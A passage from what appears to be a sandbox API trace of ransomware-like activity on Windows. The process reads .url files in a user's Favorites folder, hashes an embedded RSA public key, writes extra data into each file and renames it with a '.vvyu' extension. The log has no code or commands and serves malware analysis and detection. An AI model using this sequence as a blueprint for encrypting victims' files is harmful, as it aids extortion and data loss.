dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39180 | out: hHeap=0x6a0000) returned 1 [0189.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.360] WriteFile (in: hFile=0x584, lpBuffer=0x751d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x751d68*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.361] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.361] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.363] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.363] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.363] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.363] CloseHandle (hObject=0x584) returned 1 [0189.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0189.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0189.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0189.365] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn autos.url.vvyu")) returned 1 [0189.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.367] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.370] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a2a610, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a2a610, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0189.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0189.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.370] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0189.370] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.372] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.372] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.374] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.374] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.376] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.376] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.376] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.376] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.377] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.377] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.377] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.377] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.377] GetLastError () returned 0x0 [0189.377] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.377] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.378] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.378] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.378] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.378] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39180 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39940 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d391c8 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39958 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39988 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399e8 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399a0 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.379] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399e8 [0189.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0189.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399a0 [0189.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39988 [0189.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0189.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0189.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.383] GetCurrentThreadId () returned 0x264 [0189.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43b80 [0189.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.383] GetCurrentThreadId () returned 0x264 [0189.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399e8 [0189.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39988 [0189.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399a0 [0189.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39970 [0189.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a00 [0189.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0189.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399d0 [0189.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399b8 [0189.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.387] RtlAllocateHeap 